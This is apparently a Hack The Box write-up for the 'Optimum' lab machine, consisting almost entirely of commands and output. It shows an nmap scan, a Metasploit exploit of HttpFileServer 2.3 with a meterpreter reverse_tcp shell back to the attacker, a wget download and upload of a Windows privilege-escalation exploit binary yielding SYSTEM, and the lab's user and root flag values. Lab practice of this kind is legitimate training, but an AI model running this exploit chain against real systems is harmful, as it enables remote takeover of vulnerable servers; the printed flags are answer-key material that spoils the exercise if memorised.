Optimum (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.8
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-11 11:48 EDT
Nmap scan report for 10.10.10.8
Host is up (0.14s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 138.74 ms 10.10.14.1
2 138.75 ms 10.10.10.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.15 seconds

msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(windows/http/rejetto_hfs_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8
msf exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.14.6
msf exploit(windows/http/rejetto_hfs_exec) > set srvhost 10.10.14.6
msf exploit(windows/http/rejetto_hfs_exec) > exploit

msf exploit(windows/http/rejetto_hfs_exec) > sessions 1

meterpreter >

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

root@kali:~# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

meterpreter > upload /root/Desktop/41020.exe .
meterpreter > shell

C:\Users\kostas\Desktop>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196

Directory of C:\Users\kostas\Desktop

18/03/2019 02:51 ?? <DIR> .
18/03/2019 02:51 ?? <DIR> ..
18/03/2019 02:49 ?? <DIR> %TEMP%
18/03/2019 02:51 ?? 560.128 41020.exe
18/03/2017 02:11 ?? 760.320 hfs.exe
18/03/2019 02:41 ?? 1.358 pogrPheZqbkU.txt
18/03/2017 02:13 ?? 32 user.txt.txt
4 File(s) 1.321.838 bytes
3 Dir(s) 31.893.475.328 bytes free

C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73

C:\Users\kostas\Desktop>cd ..
cd ..

C:\Users\kostas>cd ..
cd ..

C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196

Directory of C:\Users

18/03/2017 01:57 ?? <DIR> .
18/03/2017 01:57 ?? <DIR> ..
18/03/2017 01:52 ?? <DIR> Administrator
18/03/2017 01:57 ?? <DIR> kostas
22/08/2013 05:39 ?? <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 31.893.475.328 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196

Directory of C:\Users\Administrator\Desktop

18/03/2017 02:14 ?? <DIR> .
18/03/2017 02:14 ?? <DIR> ..
18/03/2017 02:14 ?? 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 31.893.475.328 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
51ed1b36553c8461f4552c2e92b3eeed

@SAKSHAM DIXIT